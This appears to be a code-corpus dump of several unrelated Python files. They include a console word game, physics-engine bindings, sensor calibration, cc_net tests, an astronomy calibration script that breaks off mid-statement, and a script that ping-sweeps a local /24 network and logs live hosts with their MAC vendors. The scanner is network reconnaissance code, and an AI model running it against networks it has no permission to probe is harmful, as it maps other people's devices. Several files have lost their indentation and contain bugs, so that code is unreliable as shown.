if guess in ["b", "c", "d", "f", "g", "h", "j", "k", "l", "m", "n", "p", "q", "r", "s", "t", "v", "w", "x", "z"]:
print ""
print string.center(("-" * 80) , 80)
print "ERROR: INVALID ENTRY!"
print "Entry must be a vowel."
print string.center(("-" * 80) , 80)
print ""
check = False
return guess
def get_prize(game_round):
    """Return a random wheel result for the given round (1-4).

    The result is either a dollar amount (int) or one of the special wedges
    "bankrupt", "loseATurn" or "freePlay". Returns 0 for an unknown round,
    matching the original fallback.

    Fixes: the original duplicated four near-identical 72-entry wedge lists
    that differed only in the jackpot value (2500 / 3500 / 3500 / 5000);
    the wheel is now built once and the jackpot parameterised per round.
    """
    jackpots = {1: 2500, 2: 3500, 3: 3500, 4: 5000}
    if game_round not in jackpots:
        return 0
    # Wedge distribution, identical to the original 72-entry lists.
    prizes = (["bankrupt"] * 8 + [500] * 12 + [550] * 3 + [600] * 6 +
              [650] * 6 + [700] * 9 + [800] * 6 + [900] * 9 +
              [jackpots[game_round]] * 3 + ["loseATurn"] * 3 +
              ["freePlay"] * 3 + [750] * 4)
    return prizes[random.randint(0, 71)]
def get_guessWord():
print ""
guess = string.lower(raw_input("Input puzzle solution: ",))
print ""
return guess
def check_guessLetter(guess, hidden_word, disp_word):
## Exact same as bodies of rounds one through four! Figure out implementation
if guess in hidden_word:
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
disp_word = disp_word[0:(i * 2)] + guess + disp_word[((i * 2) + 1):]
print "Good guess:", disp_word
return true
else:
return false
def get_freePlayChoice(playerOrder, j):
selection_freePlay = 0
choice = False
while choice is False:
while selection_freePlay != "letter" or selection_freePlay != "choose" or selection_freePlay != "s" or selection_freePlay != "solve" or selection_freePlay != "choose a letter" or selection_freePlay != "pick" or selection_freePlay != "pick a letter" or selection_freePlay == "solve the puzzle":
print string.center(("-" * 80), 80)
print ""
print playerOrder[j] + ", would you like to solve the puzzle or choose a letter?"
selection_freePlay = raw_input("Selection: ")
selection_freePlay = selection_freePlay.lower()
if selection_freePlay == "letter" or selection_freePlay == "choose" or selection_freePlay == "s" or selection_freePlay == "solve the puzzle" or selection_freePlay == "solve" or selection_freePlay == "choose a letter" or selection_freePlay == "pick" or selection_freePlay == "pick a letter":
break
else:
print ""
print string.center(("-" * 80) , 80)
print "ERROR: UNRECOGNIZED COMMAND."
print "Please select from the following and try again:"
print "'SOLVE'"
print "'LETTER'"
print "'CHOOSE'"
print "'CHOOSE A LETTER'"
print "'PICK'"
print "'PICK A LETTER'"
print string.center(("-" * 80) , 80)
print ""
if selection_freePlay == "pick a letter" or selection_freePlay == "pick" or selection_freePlay == "letter" or selection_freePlay == "choose":
selection_freePlay = 1
return selection_freePlay
if selection_freePlay == "solve" or selection_freePlay == "solve the puzzle" or selection_freePlay == "s":
selection_freePlay = 2
return selection_freePlay
def get_playerSelection(playerOrder, hidden_word, disp_word, j, playerOrder_val_round):
selection = 0
choice = False
while choice is False:
while selection != "solve" or selection != "spin" or selection != "s" or selection != "pick" or selection != "solve the puzzle" or selection != "buy" or selection != "buy a vowel" or selection != "vowel" or selection != "v":
print string.center(("-" * 80), 80)
if playerOrder_val_round[j][0] >= 250:
print ""
print playerOrder[j] + ", would you like to SPIN, BUY A VOWEL, or SOLVE THE PUZZLE?"
else:
print ""
print playerOrder[j] + ", would you like to SPIN or SOLVE THE PUZZLE?"
selection = raw_input("Selection: ")
selection = selection.lower()
if selection == "solve" or selection == "pick" or selection == "spin" or selection == "solve the puzzle" or selection == "buy" or selection == "buy a vowel" or selection == "vowel" or selection == "v":
break
else:
print ""
print string.center(("-" * 80) , 80)
print "ERROR: UNRECOGNIZED COMMAND."
print "Please select from the following and try again:"
print "'SOLVE'"
print "'BUY A VOWEL'"
print "'SPIN'"
if selection == "pick a letter" or selection == "pick" or selection == "spin" or selection == "letter":
selection = 1
return selection
if selection == "buy" or selection == "buy a vowel" or selection == "vowel":
if playerOrder_val_round[j][0] >= 250:
selection = 3
return selection
else:
print ""
print "You need a round prize of at least $250 in order to buy a vowel."
print "Please try again."
print ""
if selection == "solve" or selection == "solve the puzzle":
selection = 0
return selection
def remove_letterGuess(guess, alpha):
    """Return *alpha* (the remaining-letters string) with every occurrence of
    *guess* removed.

    Fixes: the original used ``str.strip(guess)``, which only trims matching
    characters from the *ends* of the string, so letters in the middle of
    the alphabet were never removed. The rounds themselves use replace().
    """
    return alpha.replace(guess, "")
def get_hidden_word(hidden_word, used_letters):
    """Returns a string of the form __ad___ by filling in correct guesses"""
    shown = ""
    for ch in hidden_word:
        if ch in used_letters:
            shown += ch
            continue
        # Separate consecutive blanks with a space for readability.
        if shown.endswith("_"):
            shown += " "
        shown += "_"
    return shown
if __name__ == "__main__":
    # Only launch the game when run as a script, not when imported.
    start()
| StarcoderdataPython |
3282187 | <filename>optskills/pydart/pydart_api.py
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 2.0.11
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
"""SWIG-generated Python bindings for the pydart C extension (_pydart_api).

Auto-generated file: regenerate from the SWIG interface instead of editing.
Each flat wrapper below simply forwards to the same-named symbol in the
compiled _pydart_api extension module and is immediately rebound to the raw
C function on the following line.
"""
from sys import version_info
if version_info >= (2,6,0):
    def swig_import_helper():
        from os.path import dirname
        import imp
        fp = None
        try:
            fp, pathname, description = imp.find_module('_pydart_api', [dirname(__file__)])
        except ImportError:
            import _pydart_api
            return _pydart_api
        if fp is not None:
            try:
                _mod = imp.load_module('_pydart_api', fp, pathname, description)
            finally:
                fp.close()
            return _mod
    _pydart_api = swig_import_helper()
    del swig_import_helper
else:
    import _pydart_api
del version_info
try:
    _swig_property = property
except NameError:
    pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self,class_type,name,value,static=1):
    if (name == "thisown"): return self.this.own(value)
    if (name == "this"):
        if type(value).__name__ == 'SwigPyObject':
            self.__dict__[name] = value
            return
    method = class_type.__swig_setmethods__.get(name,None)
    if method: return method(self,value)
    if (not static):
        self.__dict__[name] = value
    else:
        raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self,class_type,name,value):
    return _swig_setattr_nondynamic(self,class_type,name,value,0)
def _swig_getattr(self,class_type,name):
    if (name == "thisown"): return self.this.own()
    method = class_type.__swig_getmethods__.get(name,None)
    if method: return method(self)
    raise AttributeError(name)
def _swig_repr(self):
    try: strthis = "proxy of " + self.this.__repr__()
    except: strthis = ""
    return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
    _object = object
    _newclass = 1
except AttributeError:
    class _object : pass
    _newclass = 0
# ---- Flat wrapper functions (generated): each def forwards to the C
# extension and is then rebound directly to the raw C symbol. ----
def init():
  return _pydart_api.init()
init = _pydart_api.init
def destroy():
  return _pydart_api.destroy()
destroy = _pydart_api.destroy
def createWorld(*args):
  return _pydart_api.createWorld(*args)
createWorld = _pydart_api.createWorld
def createWorldFromSkel(*args):
  return _pydart_api.createWorldFromSkel(*args)
createWorldFromSkel = _pydart_api.createWorldFromSkel
def destroyWorld(*args):
  return _pydart_api.destroyWorld(*args)
destroyWorld = _pydart_api.destroyWorld
def addSkeleton(*args):
  return _pydart_api.addSkeleton(*args)
addSkeleton = _pydart_api.addSkeleton
def numSkeletons(*args):
  return _pydart_api.numSkeletons(*args)
numSkeletons = _pydart_api.numSkeletons
def setSkeletonJointDamping(*args):
  return _pydart_api.setSkeletonJointDamping(*args)
setSkeletonJointDamping = _pydart_api.setSkeletonJointDamping
def resetWorld(*args):
  return _pydart_api.resetWorld(*args)
resetWorld = _pydart_api.resetWorld
def stepWorld(*args):
  return _pydart_api.stepWorld(*args)
stepWorld = _pydart_api.stepWorld
def render(*args):
  return _pydart_api.render(*args)
render = _pydart_api.render
def renderSkeleton(*args):
  return _pydart_api.renderSkeleton(*args)
renderSkeleton = _pydart_api.renderSkeleton
def renderSkeletonWithColor(*args):
  return _pydart_api.renderSkeletonWithColor(*args)
renderSkeletonWithColor = _pydart_api.renderSkeletonWithColor
def getWorldTime(*args):
  return _pydart_api.getWorldTime(*args)
getWorldTime = _pydart_api.getWorldTime
def getWorldTimeStep(*args):
  return _pydart_api.getWorldTimeStep(*args)
getWorldTimeStep = _pydart_api.getWorldTimeStep
def setWorldTimeStep(*args):
  return _pydart_api.setWorldTimeStep(*args)
setWorldTimeStep = _pydart_api.setWorldTimeStep
def getWorldSimFrames(*args):
  return _pydart_api.getWorldSimFrames(*args)
getWorldSimFrames = _pydart_api.getWorldSimFrames
def setWorldSimFrame(*args):
  return _pydart_api.setWorldSimFrame(*args)
setWorldSimFrame = _pydart_api.setWorldSimFrame
def getWorldNumContacts(*args):
  return _pydart_api.getWorldNumContacts(*args)
getWorldNumContacts = _pydart_api.getWorldNumContacts
def getWorldContacts(*args):
  return _pydart_api.getWorldContacts(*args)
getWorldContacts = _pydart_api.getWorldContacts
def getSkeletonMass(*args):
  return _pydart_api.getSkeletonMass(*args)
getSkeletonMass = _pydart_api.getSkeletonMass
def getSkeletonNumBodies(*args):
  return _pydart_api.getSkeletonNumBodies(*args)
getSkeletonNumBodies = _pydart_api.getSkeletonNumBodies
def getSkeletonNumDofs(*args):
  return _pydart_api.getSkeletonNumDofs(*args)
getSkeletonNumDofs = _pydart_api.getSkeletonNumDofs
def getSkeletonBodyName(*args):
  return _pydart_api.getSkeletonBodyName(*args)
getSkeletonBodyName = _pydart_api.getSkeletonBodyName
def getSkeletonDofName(*args):
  return _pydart_api.getSkeletonDofName(*args)
getSkeletonDofName = _pydart_api.getSkeletonDofName
def getSkeletonPositions(*args):
  return _pydart_api.getSkeletonPositions(*args)
getSkeletonPositions = _pydart_api.getSkeletonPositions
def getSkeletonVelocities(*args):
  return _pydart_api.getSkeletonVelocities(*args)
getSkeletonVelocities = _pydart_api.getSkeletonVelocities
def getSkeletonMassMatrix(*args):
  return _pydart_api.getSkeletonMassMatrix(*args)
getSkeletonMassMatrix = _pydart_api.getSkeletonMassMatrix
def getSkeletonCoriolisAndGravityForces(*args):
  return _pydart_api.getSkeletonCoriolisAndGravityForces(*args)
getSkeletonCoriolisAndGravityForces = _pydart_api.getSkeletonCoriolisAndGravityForces
def getSkeletonConstraintForces(*args):
  return _pydart_api.getSkeletonConstraintForces(*args)
getSkeletonConstraintForces = _pydart_api.getSkeletonConstraintForces
def setSkeletonPositions(*args):
  return _pydart_api.setSkeletonPositions(*args)
setSkeletonPositions = _pydart_api.setSkeletonPositions
def setSkeletonVelocities(*args):
  return _pydart_api.setSkeletonVelocities(*args)
setSkeletonVelocities = _pydart_api.setSkeletonVelocities
def setSkeletonForces(*args):
  return _pydart_api.setSkeletonForces(*args)
setSkeletonForces = _pydart_api.setSkeletonForces
def getSkeletonPositionLowerLimit(*args):
  return _pydart_api.getSkeletonPositionLowerLimit(*args)
getSkeletonPositionLowerLimit = _pydart_api.getSkeletonPositionLowerLimit
def getSkeletonPositionUpperLimit(*args):
  return _pydart_api.getSkeletonPositionUpperLimit(*args)
getSkeletonPositionUpperLimit = _pydart_api.getSkeletonPositionUpperLimit
def getSkeletonForceLowerLimit(*args):
  return _pydart_api.getSkeletonForceLowerLimit(*args)
getSkeletonForceLowerLimit = _pydart_api.getSkeletonForceLowerLimit
def getSkeletonForceUpperLimit(*args):
  return _pydart_api.getSkeletonForceUpperLimit(*args)
getSkeletonForceUpperLimit = _pydart_api.getSkeletonForceUpperLimit
def getSkeletonWorldCOM(*args):
  return _pydart_api.getSkeletonWorldCOM(*args)
getSkeletonWorldCOM = _pydart_api.getSkeletonWorldCOM
def getSkeletonWorldCOMVelocity(*args):
  return _pydart_api.getSkeletonWorldCOMVelocity(*args)
getSkeletonWorldCOMVelocity = _pydart_api.getSkeletonWorldCOMVelocity
def getBodyNodeMass(*args):
  return _pydart_api.getBodyNodeMass(*args)
getBodyNodeMass = _pydart_api.getBodyNodeMass
def getBodyNodeInertia(*args):
  return _pydart_api.getBodyNodeInertia(*args)
getBodyNodeInertia = _pydart_api.getBodyNodeInertia
def getBodyNodeLocalCOM(*args):
  return _pydart_api.getBodyNodeLocalCOM(*args)
getBodyNodeLocalCOM = _pydart_api.getBodyNodeLocalCOM
def getBodyNodeWorldCOM(*args):
  return _pydart_api.getBodyNodeWorldCOM(*args)
getBodyNodeWorldCOM = _pydart_api.getBodyNodeWorldCOM
def getBodyNodeWorldCOMVelocity(*args):
  return _pydart_api.getBodyNodeWorldCOMVelocity(*args)
getBodyNodeWorldCOMVelocity = _pydart_api.getBodyNodeWorldCOMVelocity
def getBodyNodeNumContacts(*args):
  return _pydart_api.getBodyNodeNumContacts(*args)
getBodyNodeNumContacts = _pydart_api.getBodyNodeNumContacts
def getBodyNodeContacts(*args):
  return _pydart_api.getBodyNodeContacts(*args)
getBodyNodeContacts = _pydart_api.getBodyNodeContacts
def getBodyNodeTransformation(*args):
  return _pydart_api.getBodyNodeTransformation(*args)
getBodyNodeTransformation = _pydart_api.getBodyNodeTransformation
def getBodyNodeWorldLinearJacobian(*args):
  return _pydart_api.getBodyNodeWorldLinearJacobian(*args)
getBodyNodeWorldLinearJacobian = _pydart_api.getBodyNodeWorldLinearJacobian
def addBodyNodeExtForce(*args):
  return _pydart_api.addBodyNodeExtForce(*args)
addBodyNodeExtForce = _pydart_api.addBodyNodeExtForce
def addBodyNodeExtForceAt(*args):
  return _pydart_api.addBodyNodeExtForceAt(*args)
addBodyNodeExtForceAt = _pydart_api.addBodyNodeExtForceAt
# This file is compatible with both classic and new-style classes.
| StarcoderdataPython |
3267623 | #!/usr/bin/env python
import yaml, sys
def calib_from_file(filename):
y = yaml.load(file(filename, 'r'))
lower = [[1e6]*3, [1e6]*3, [1e6]*3]
upper = [[-1e6]*3, [-1e6]*3, [-1e6]*3]
boards = { 'mm': 0, 'pp': 1, 'dp': 2 }
for sample in y:
for board_name, board_idx in boards.iteritems():
for axis in xrange(0,3):
if sample[board_name][axis] > upper[board_idx][axis]:
upper[board_idx][axis] = sample[board_name][axis]
if sample[board_name][axis] < lower[board_idx][axis]:
lower[board_idx][axis] = sample[board_name][axis]
bias = [[0]*3, [0]*3, [0]*3]
scale = [[0]*3, [0]*3, [0]*3]
for board_name, board_idx in boards.iteritems():
for axis in xrange(0, 3):
bias[board_idx][axis] = (upper[board_idx][axis] +
lower[board_idx][axis]) / 2
scale[board_idx][axis] = (upper[board_idx][axis] -
lower[board_idx][axis]) / 2
print "min: " + str(lower)
print "max: " + str(upper)
print "bias: " + str(bias)
print "scale: " + str(scale)
if __name__ == '__main__':
    # Expect exactly one argument: the YAML file of calibration samples.
    if len(sys.argv) != 2:
        print "usage: calib_accels.py YAML_FILENAME"
        sys.exit(1)
    calib_from_file(sys.argv[1])
| StarcoderdataPython |
108696 | import subprocess
import sys
import ipaddress
import threading
import re
import time
import platform
from datetime import datetime
from multiprocessing import Queue
# Verifie que oui.txt est present sinon on le recupere
# Ensure the IEEE OUI database is present; download it with requests if not.
try:
    # NOTE(review): `file` shadows the (Python 2) builtin name; a different
    # identifier would be cleaner.
    file = open('oui.txt', encoding='utf-8', mode='r')
    file.close()
except FileNotFoundError:
    try:
        import requests
        print('[-] Le fichier "oui.txt" est manquant!')
        print('[+] Telechargement du fichier..')
        # NOTE(review): no timeout and no status-code check — a hung or
        # failed HTTP request is not handled here.
        data = requests.get('http://standards-oui.ieee.org/oui.txt')
        data = data.content.decode('utf-8')
        file = open('oui.txt', encoding='utf-8', mode='w')
        file.write(data)
        file.close()
        print('[+] Ecriture dans "oui.txt"..')
    except (ImportError, ModuleNotFoundError):
        print('[-] La librairie requests est necessaire pour telecharger le fichier requis!')
        print('[-] Telecharger manuellement "oui.txt" depuis: http://standards-oui.ieee.org/oui.txt')
        exit(1)
    # NOTE(review): this trailing `pass` is redundant.
    pass
# Recuperation et formatage de l'adresse
# Acquire the target address (argv or prompt) and expand it to its /24.
# Fixes: the original only validated the address when it came from input();
# a malformed sys.argv[1] crashed later with a raw ip_network traceback.
try:
    ip = sys.argv[1]
except IndexError:
    ip = input('[>] Adresse IP: ')
try:
    ipaddress.ip_address(ip)
except ValueError:
    print('[-] Adresse IP invalide!')
    print('[-] Usage: python scan.py [adresse ip] [nb de threads]')
    exit(1)
# Replace the last octet with 0 and scan the whole /24 network.
octets = ip.split('.')
octets.pop(-1)
ip = '.'.join(octets) + '.0/24'
ip = ipaddress.ip_network(ip)
iplist = [str(x) for x in ip.hosts()]
# Nombre de threads souhaiter
# Desired worker-thread count (second CLI argument, default 8).
try:
    thnumber = int(sys.argv[2])
except (IndexError, ValueError):
    thnumber = 8
    print(f'[+] Threads par defaut: {thnumber}')
# List collecting the devices found online: (addr, mac, vendor) tuples.
online = []
# List of IPs already claimed by a worker, so two threads do not
# process the same address.
handled = []
# Timestamp used to name the log file.
dt = datetime.now()
# OS check: True on Windows (changes ping/arp flags in worker()).
# NOTE(review): could simply be `platform.system() == 'Windows'`.
plat = True if platform.system() == 'Windows' else False
# Job queue feeding the worker threads.
q = Queue()
for addr in iplist:
    q.put(addr)
def worker():
    # Thread body: consume IP addresses from the shared queue `q`, ping each
    # one, and record responsive hosts (with MAC address and vendor when they
    # can be resolved) in the shared `online` list.  Exits when it dequeues
    # the `None` sentinel.
    while True:
        addr = q.get()  # fetch the next job (an IP address as a string)
        if addr is None:  # sentinel: no work left, stop this thread
            return
        if addr in handled:  # skip addresses another thread already claimed
            continue  # NOTE(review): check-then-append is racy; duplicates are possible
        handled.append(addr)
        if not plat:  # build OS-specific command lines (plat is True on Windows)
            # NOTE(review): on Linux, `ping -W` takes seconds, so 1000 is a
            # ~16-minute timeout; Windows `-w` is milliseconds — confirm the
            # intended unit.
            ping = ['ping', '-c', '1', '-W', '1000']
            arp = ['arp']
        else:
            ping = ['ping', '-n', '1', '-w', '1000']
            arp = ['arp', '-a']
        ping.append(addr)
        try:
            # Ping once; check=True raises on non-zero exit (host unreachable).
            proc = subprocess.run(ping, stdout=subprocess.DEVNULL, check=True) # launch a ping subprocess
            print(f'[+] {addr}')
        except subprocess.CalledProcessError:
            continue
        # Recover the MAC address from the local ARP cache.
        arp.append(addr)
        mac = None
        vendor = None
        try:
            proc = subprocess.run(arp, stdout=subprocess.PIPE, universal_newlines=True, check=True)
            # Matches 6 hex-pairs separated by '-' or ':' (Windows/Unix formats).
            mac = re.findall(r"(?:\w{2}-?:?){6}", str(proc.stdout),
                             re.MULTILINE | re.IGNORECASE)
            mac = mac.pop().upper()
            print(f'[+] {mac}')
            try:
                # Look up the vendor by OUI prefix (first 3 octets) in oui.txt,
                # whose lines are formatted "XX-XX-XX   (hex)\t\tVendor name".
                file = open("oui.txt", encoding="utf-8", mode="r")
                lines = file.readlines()
                ouimac = mac[0:8].split(':')
                ouimac = '-'.join(ouimac)
                for line in lines:
                    if ouimac in line:
                        vendor = line[16:].lstrip()
                        vendor = vendor.rstrip("\n")
                        break
                file.close()
            except FileNotFoundError:
                print('[-] Fichier "oui.txt" manquant!')
                pass
        except (subprocess.CalledProcessError, ValueError, IndexError) as err:
            # arp failed or no MAC matched: record nothing for this host.
            print(f'[-] {addr} impossible de recuperer la MAC: [{err}]')
            continue
        # Record the host with whatever information could be resolved.
        if mac is not None:
            if vendor is not None:
                online.append((addr, mac, vendor))
            else:
                online.append((addr, mac, 'Inconnu'))
        else:
            online.append((addr, 'Inconnu', 'Inconnu'))
# Launch the worker threads.
threads = [threading.Thread(target=worker) for _i in range(thnumber)]
for thread in threads:
    thread.start()
# One sentinel per thread: each worker exits after consuming exactly one None.
# (The original put a single sentinel, which stopped only one worker and left
# the remaining threads blocked forever on q.get() — join() then deadlocked.)
for _ in threads:
    q.put(None)
for thread in threads:
    thread.join()
print('[+] Classement par ordre croissant des adresses..')
# Sort results in numeric IP order (a plain string sort would put 10.* before 2.*).
online = sorted(online, key=lambda x: ipaddress.ip_address(x[0]))
time.sleep(1)
# Write the scan report, named after the start-of-scan timestamp.
log = dt.strftime("%d%m%y_%I%M%p")
log = f'scan_{log}.txt'
print(f'[+] Ecriture du resultat dans "{log}"..')
with open(log, encoding="utf-8", mode="w") as file:
    content = ''
    for item in online:
        content = content + f'Adresse:\t{item[0]}\n'
        # NOTE: items are always 3-tuples, so these IndexError guards are
        # effectively dead code; kept to preserve behavior exactly.
        try:
            content = content + f'MAC:\t\t{item[1]}\n'
        except IndexError:
            pass
        try:
            content = content + f'Fabricant:\t{item[2]}\n'
        except IndexError:
            pass
        content = content + '\n'
    content = content + '\n---EOF---'
    file.write(content)
time.sleep(1)
print('[+] Fin du script.')
input('[>] Appuyez sur Entree pour quitter..')
exit(0)
| StarcoderdataPython |
30404 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import json
from pathlib import Path
import pytest
import cc_net
import cc_net.minify as minify
from cc_net import jsonql, process_wet_file
from cc_net.minify import (
HASH_SIZE,
decode_hashes,
encode_hashes,
encode_line_ids,
get_hashes,
)
def test_encode_decode():
    """encode_hashes/decode_hashes must round-trip hashes without loss."""
    lines = ["Hello world !", "Is everyone happy in here ?"]
    original = get_hashes(lines)
    assert all(len(digest) == HASH_SIZE for digest in original)
    original_ints = [minify._b2i(digest) for digest in original]
    round_tripped = decode_hashes(encode_hashes(original))
    assert all(len(digest) == HASH_SIZE for digest in round_tripped)
    round_tripped_ints = [minify._b2i(digest) for digest in round_tripped]
    # Compare both the integer view and the raw byte strings.
    assert original_ints == round_tripped_ints
    assert original == round_tripped
def test_minify():
    """Minifier should keep only metadata fields and base64-encode line_ids."""
    document = {
        "raw_content": "Hello world !\nIs everyone happy in here ?",
        "language": "en",
        "perplexity": 120.0,
        "line_ids": [0, 4],
    }
    slimmed = minify.Minifier()(document)
    assert slimmed == {"line_ids": "AAAEAA==", "language": "en", "perplexity": 120.0}
@pytest.fixture
def http_from_disk(monkeypatch):
    """Patch jsonql's HTTP fetch so the sample WET segment is served from disk."""
    def serve_sample_file(url: str, n_retry: int = 3) -> bytes:
        # The tests must only ever request the known sample segment.
        sample_url = process_wet_file.WET_URL_ROOT + "/crawl-data/sample.warc.wet"
        assert sample_url == url
        sample_path = Path(__file__).parent / "data" / "sample.warc.txt"
        return sample_path.read_bytes()

    monkeypatch.setattr(cc_net.jsonql, "request_get_content", serve_sample_file)
def test_minify_and_fetch(http_from_disk, tmp_path: Path):
    """Round-trip a document: minify it, then restore it from the WET segment.

    Checks that Minifier keeps only the metadata fields (with line_ids encoded)
    and that MetadataFetcher reconstructs the full document from the original
    CommonCrawl segment (served from disk by the http_from_disk fixture).
    """
    full_quotes = """Don't part with your illusions. When they are gone you may still exist, but you have ceased to live.
Education: that which reveals to the wise, and conceals from the stupid, the vast limits of their knowledge.
Facts are stubborn things, but statistics are more pliable.
Fiction is obliged to stick to possibilities. Truth isn't."""
    # We don't need no education: drop that line to mimic ccnet's line filtering.
    chosen_quotes = "\n".join(
        l for l in full_quotes.splitlines() if "Education" not in l
    )

    # The document as it appears in the raw CommonCrawl dump.
    cc_doc = {
        "url": "http://sample_english.com",
        "date_download": "2019-03-18T00:00:00Z",
        "digest": "sha1:XQZHW7QWIG54HVAV3KPRW6MK5ILDNCER",
        "source_domain": "sample_english.com",
        "title": "Famous Mark Twain Quotes",
        "raw_content": full_quotes,
        "cc_segment": "crawl-data/sample.warc.wet",
        "nlines": 4,
        "length": 353,
    }

    # Extra fields added by the cc_net pipeline (line 1 was filtered out).
    ccnet_metadata = {
        "language": "en",
        "language_score": 0.99,
        "perplexity": 151.5,
        "bucket": "head",
        "raw_content": chosen_quotes,
        "nlines": 3,
        "length": len(chosen_quotes),
        "original_nlines": 4,
        "original_length": 353,
        "line_ids": [0, 2, 3],
    }
    ccnet_doc = dict(cc_doc, **ccnet_metadata)
    mini = minify.Minifier()(ccnet_doc.copy())
    assert mini is not ccnet_doc

    # Minification keeps only these fields, with line_ids encoded.
    important_fields = [
        "url",
        "digest",
        "cc_segment",
        "language",
        "language_score",
        "perplexity",
        "bucket",
        "line_ids",
    ]
    expected = {k: ccnet_doc[k] for k in important_fields}
    expected["line_ids"] = encode_line_ids(expected["line_ids"])  # type: ignore
    assert expected == mini

    # Unminifying the metadata against the raw doc restores the full document.
    with jsonql.open_write(tmp_path / "sample.json") as o:
        print(json.dumps(mini), file=o)
    fetcher = minify.MetadataFetcher(tmp_path)
    # line_ids is removed when unminifying
    ccnet_doc.pop("line_ids")
    assert ccnet_doc == fetcher(cc_doc)
def test_fetch(http_from_disk, tmp_path: Path):
    """MetadataFetcher should restore the selected lines of several minified docs
    from a single CommonCrawl segment (served from disk by the fixture)."""
    mini_docs = [
        {
            "url": "http://sample_chinese.com",
            "digest": "sha1:Y4E6URVYGIAFNVRTPZ5S3J64RTZTP6HJ",
            "cc_segment": "crawl-data/sample.warc.wet",
            "line_ids": encode_line_ids([2]),
            "bucket": "not_that_great",
        },
        {
            "url": "http://sample_english.com",
            "digest": "sha1:XQZHW7QWIG54HVAV3KPRW6MK5ILDNCER",
            "cc_segment": "crawl-data/sample.warc.wet",
            "line_ids": encode_line_ids([3]),
            "bucket": "top_notch",
        },
    ]
    # Write the minified docs to disk so MetadataFetcher can pick them up.
    with jsonql.open_write(tmp_path / "sample.json") as o:
        for mini in mini_docs:
            print(json.dumps(mini), file=o)

    fetcher = minify.MetadataFetcher(tmp_path)
    cc = process_wet_file.CCSegmentsReader(["crawl-data/sample.warc.wet"])
    docs = [d for d in fetcher.map(cc) if d is not None]
    # Both docs come from the same segment, so it must be read only once.
    assert cc.retrieved_segments == 1

    # Note: documents are retrieved as they are ordered in the .warc.wet file
    assert [
        "Facts are stubborn things, but statistics are more pliable.",
        "事實是固執的東西,但統計數字卻比較柔和。",
    ] == [d["raw_content"] for d in docs]
    assert ["top_notch", "not_that_great"] == [d["bucket"] for d in docs]
| StarcoderdataPython |
1694378 | '''
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SALT RSS Calibration
This program performs the flux calibration and heliocentric velocity correction
for a FITS file reduced by the SALT RSS pipeline.
The target FITS file is typically a 2D flux spectrum of a galaxy, but may be of other astronomical objects.
*NOTE*: This requires a pre-existing sensitivity or sens FITS file.
The SALT RSS Data Reduction procedure is described in:
http://mips.as.arizona.edu/~khainline/salt_redux.html
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
'''
'''
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Import Python Libraries
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
'''
import os # For bash commands
from pyraf import iraf # For IRAF commands in Python
import astropy.io.fits as fits # For FITS file handling
'''
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Load IRAF Libraries
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
'''
# Load the IRAF packages required below: noao.twod.longslit for the flux
# calibration task and imutil for FITS header editing.
iraf.noao()
iraf.noao.twod()
iraf.noao.twod.longslit()
iraf.imutil()
'''
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Flux Calibration
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
'''
def flux(file, err_file, basename):
    '''
    Applies the flux calibration for the astronomical object's FITS file using a pre-existing sensitivity or sens file.

    :param file [String]: Filename (with extension) of the FITS file.
    :param err_file [String]: Filename (with extension) of the error (1 sigma) FITS file.
    :param basename [String]: Basename of the FITS file.
    :return: fc_file [String]: Filename of the *flux corrected* FITS file.
    :return fc_err_file [String]: Filename of the *flux corrected* error (1 sigma) FITS file.
    '''
    print('\n------------------------\nFlux Calibration\n-------------------------\n')

    # Load sensitivity FITS file (raw_input: this script targets Python 2).
    sens = raw_input('Please enter the complete filepath (with extension) of the sensitivity file: ')

    # Set names of *flux corrected* FITS files.
    fc_file = 'fc_{}.fits'.format(basename)
    fc_err_file = 'fc_err_{}.fits'.format(basename)

    # Apply the flux calibration to both the science and the error frame.
    iraf.noao.twod.longslit.calibrate(file, output=fc_file, sensitivity=sens, fnu='No')
    iraf.noao.twod.longslit.calibrate(err_file, output=fc_err_file, sensitivity=sens, fnu='No')

    # Extract the header keywords to propagate, then close the FITS handle
    # (the original left it open).
    hdu = fits.open(file)
    hdr = hdu[0].header
    header_fields = [
        ('RA', hdr['RA']),
        ('DEC', hdr['DEC']),
        ('UT', hdr['UTC-OBS']),
        ('DATE-OBS', hdr['DATE-OBS']),
        ('EPOCH', hdr['EPOCH']),
        ('OBSERVAT', hdr['OBSERVAT']),
    ]
    hdu.close()

    # Copy the keywords into both newly created files (replaces 12 duplicated
    # hedit calls with one loop).
    for target in (fc_file, fc_err_file):
        for field, value in header_fields:
            iraf.imutil.hedit(images=target, fields=field, value=value)

    return fc_file, fc_err_file
'''
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Heliocentric Velocity Correction
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
'''
def velcor(fc_file, fc_err_file, basename):
    '''
    Generates (prints) the bash code that can be used to apply the heliocentric
    velocity correction to the *flux calibrated* FITS files.

    *Note*: The code is only printed, not executed, because the velocity
    correction command needs manual input through the command terminal.
    This just speeds up the process by generating code you can copy and paste.

    :param fc_file [String]: Filename of the *flux corrected* FITS file.
    :param fc_err_file [String]: Filename of the *flux corrected* error (1 sigma) FITS file.
    :param basename [String]: Basename of the FITS file.
    :return: None
    '''
    # Set names of *heliocentric velocity corrected* FITS files.
    hc_file = 'hc_{}.fits'.format(basename)
    hc_err_file = 'hc_err_{}.fits'.format(basename)
    print(
        '\n---------------------------------------\nHeliocentric Velocity Correction\n---------------------------------------\n')
    # NOTE(review): "aperture attraction" below is likely a typo for
    # "aperture extraction" — confirm before changing the message.
    print(
